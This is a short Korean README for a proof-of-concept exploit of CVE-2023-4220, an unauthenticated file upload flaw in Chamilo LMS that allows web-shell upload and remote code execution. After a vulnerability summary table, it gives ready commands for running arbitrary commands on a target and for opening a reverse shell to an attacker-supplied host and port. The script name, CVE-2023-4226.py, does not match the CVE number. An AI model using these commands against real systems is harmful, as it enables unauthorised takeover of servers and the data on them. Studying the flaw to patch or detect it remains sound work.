
POC for CVE-2023-4220 - Chamilo LMS 인증되지 않은 대용량 파일 업로드를 통한 원격 코드 실행
CVE-2023-4220에 대한 자세한 정보: StarLabs Advisory
| 제품 | Chamilo |
|---|---|
| 공급업체 | Chamilo |
| 심각도 | 높음 - 공격자가 소프트웨어 취약점을 악용하여 인증되지 않은 원격 코드 실행을 얻을 수 있습니다. |
| 영향 받는 버전 | <= v1.11.24 |
| 테스트된 버전 | v1.11.24 (작성 시점의 최신 버전) |
| CVE 식별자 | CVE-2023-4220 |
| CVE 설명 | Chamilo LMS <= v1.11.24의 /main/inc/lib/javascript/bigupload/inc/bigUpload.php에서 대용량 파일 업로드 기능의 무제한 파일 업로드로 인해 인증되지 않은 공격자가 저장형 크로스 사이트 스크립팅 공격을 수행하고 웹 셸 업로드를 통해 원격 코드 실행을 얻을 수 있습니다. |
| CWE 분류 | CWE-434: 위험한 유형의 파일 무제한 업로드 |
| CAPEC 분류 | CAPEC-650: 웹 서버에 웹 셸 업로드 |
명령을 직접 실행하려면 다음 명령을 사용하세요:
python CVE-2023-4226.py -u http://<target_ip>:<target_port> -c whoami
리버스 셸을 얻으려면 다음 명령을 사용하세요:
python CVE-2023-4226.py -u http://<target_ip>:<target_port> -lhost <local_ip> -lport <local_port>